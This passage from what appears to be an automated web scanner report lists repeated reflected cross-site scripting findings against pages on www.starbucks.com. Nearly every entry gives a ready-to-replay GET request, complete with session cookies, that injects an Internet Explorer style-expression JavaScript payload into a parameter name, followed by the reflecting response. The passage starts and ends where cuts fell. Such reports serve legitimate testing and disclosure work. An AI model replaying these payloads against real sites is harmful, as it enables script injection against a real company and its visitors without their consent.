This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/diversity/suppliers?2ab1f"style%3d"x%3aexpression(alert(1))"18d18debd9f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:09 GMT
Connection: close
Content-Length: 39052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/diversity/suppliers?2ab1f"style="x:expression(alert(1))"18d18debd9f=1" />
...[SNIP]...

1.908. http://www.starbucks.com/responsibility/environment [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74254"style%3d"x%3aexpression(alert(1))"cd978537e36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74254"style="x:expression(alert(1))"cd978537e36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment?74254"style%3d"x%3aexpression(alert(1))"cd978537e36=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:58 GMT
Connection: close
Content-Length: 50714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment?74254"style="x:expression(alert(1))"cd978537e36=1"/>
...[SNIP]...

1.909. http://www.starbucks.com/responsibility/environment/climate-change [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/climate-change

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8714c"style%3d"x%3aexpression(alert(1))"f8e10288012 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8714c"style="x:expression(alert(1))"f8e10288012 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/climate-change?8714c"style%3d"x%3aexpression(alert(1))"f8e10288012=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:48 GMT
Connection: close
Content-Length: 40326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/climate-change?8714c"style="x:expression(alert(1))"f8e10288012=1"/>
...[SNIP]...

1.910. http://www.starbucks.com/responsibility/environment/energy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59bfc"style%3d"x%3aexpression(alert(1))"c24986dd6f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59bfc"style="x:expression(alert(1))"c24986dd6f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/energy?59bfc"style%3d"x%3aexpression(alert(1))"c24986dd6f7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:26 GMT
Connection: close
Content-Length: 39146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/energy?59bfc"style="x:expression(alert(1))"c24986dd6f7=1"/>
...[SNIP]...

1.911. http://www.starbucks.com/responsibility/environment/explore-green-store [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/explore-green-store

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be99d"style%3d"x%3aexpression(alert(1))"dce46789f55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be99d"style="x:expression(alert(1))"dce46789f55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/explore-green-store?be99d"style%3d"x%3aexpression(alert(1))"dce46789f55=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:15 GMT
Connection: close
Content-Length: 36700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/explore-green-store?be99d"style="x:expression(alert(1))"dce46789f55=1" />
...[SNIP]...

1.912. http://www.starbucks.com/responsibility/environment/green-building [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/green-building

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81427"style%3d"x%3aexpression(alert(1))"70b16b5ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81427"style="x:expression(alert(1))"70b16b5ded in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/green-building?81427"style%3d"x%3aexpression(alert(1))"70b16b5ded=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:37 GMT
Connection: close
Content-Length: 40773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/green-building?81427"style="x:expression(alert(1))"70b16b5ded=1"/>
...[SNIP]...

1.913. http://www.starbucks.com/responsibility/environment/recycling [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/recycling

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8710"style%3d"x%3aexpression(alert(1))"183500e045d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8710"style="x:expression(alert(1))"183500e045d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/recycling?a8710"style%3d"x%3aexpression(alert(1))"183500e045d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:25 GMT
Connection: close
Content-Length: 43161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/recycling?a8710"style="x:expression(alert(1))"183500e045d=1"/>
...[SNIP]...

1.914. http://www.starbucks.com/responsibility/environment/water [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/environment/water

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd1dc"style%3d"x%3aexpression(alert(1))"3a75d5838b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd1dc"style="x:expression(alert(1))"3a75d5838b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/environment/water?cd1dc"style%3d"x%3aexpression(alert(1))"3a75d5838b9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:16:30 GMT
Connection: close
Content-Length: 39187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/environment/water?cd1dc"style="x:expression(alert(1))"3a75d5838b9=1"/>
...[SNIP]...

1.915. http://www.starbucks.com/responsibility/learn-more/goals-and-progress [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/goals-and-progress

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2e8"style%3d"x%3aexpression(alert(1))"0acfa560360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e2e8"style="x:expression(alert(1))"0acfa560360 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/goals-and-progress?4e2e8"style%3d"x%3aexpression(alert(1))"0acfa560360=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:18 GMT
Connection: close
Content-Length: 45450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/goals-and-progress?4e2e8"style="x:expression(alert(1))"0acfa560360=1" />
...[SNIP]...

1.916. http://www.starbucks.com/responsibility/learn-more/policies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/policies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dacc1"style%3d"x%3aexpression(alert(1))"58441f58f39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dacc1"style="x:expression(alert(1))"58441f58f39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/policies?dacc1"style%3d"x%3aexpression(alert(1))"58441f58f39=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:16 GMT
Connection: close
Content-Length: 38100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/policies?dacc1"style="x:expression(alert(1))"58441f58f39=1"/>
...[SNIP]...

1.917. http://www.starbucks.com/responsibility/learn-more/relationships [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/relationships

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39d95"style%3d"x%3aexpression(alert(1))"d979f153017 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39d95"style="x:expression(alert(1))"d979f153017 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/relationships?39d95"style%3d"x%3aexpression(alert(1))"d979f153017=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:16 GMT
Connection: close
Content-Length: 48018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/relationships?39d95"style="x:expression(alert(1))"d979f153017=1"/>
...[SNIP]...

1.918. http://www.starbucks.com/responsibility/learn-more/shared-values-blog [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/shared-values-blog

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa51c"style%3d"x%3aexpression(alert(1))"92ca21ea562 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa51c"style="x:expression(alert(1))"92ca21ea562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/shared-values-blog?fa51c"style%3d"x%3aexpression(alert(1))"92ca21ea562=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:46 GMT
Connection: close
Content-Length: 46392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/shared-values-blog?fa51c"style="x:expression(alert(1))"92ca21ea562=1"/>
...[SNIP]...

1.919. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/learn-more/starbucks-shared-planet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21608"style%3d"x%3aexpression(alert(1))"cf8f3b757dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21608"style="x:expression(alert(1))"cf8f3b757dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/learn-more/starbucks-shared-planet?21608"style%3d"x%3aexpression(alert(1))"cf8f3b757dc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:17:34 GMT
Connection: close
Content-Length: 37394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet?21608"style="x:expression(alert(1))"cf8f3b757dc=1"/>
...[SNIP]...

1.920. http://www.starbucks.com/responsibility/sourcing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab705"style%3d"x%3aexpression(alert(1))"0db2c74b13d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab705"style="x:expression(alert(1))"0db2c74b13d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing?ab705"style%3d"x%3aexpression(alert(1))"0db2c74b13d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:01 GMT
Connection: close
Content-Length: 51277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/sourcing?ab705"style="x:expression(alert(1))"0db2c74b13d=1"/>
...[SNIP]...

1.921. http://www.starbucks.com/responsibility/sourcing/cocoa [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/cocoa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 649df"style%3d"x%3aexpression(alert(1))"f64e12d5982 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 649df"style="x:expression(alert(1))"f64e12d5982 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /responsibility/sourcing/cocoa?649df"style%3d"x%3aexpression(alert(1))"f64e12d5982=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:15:54 GMT
Connection: close
Content-Length: 38743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
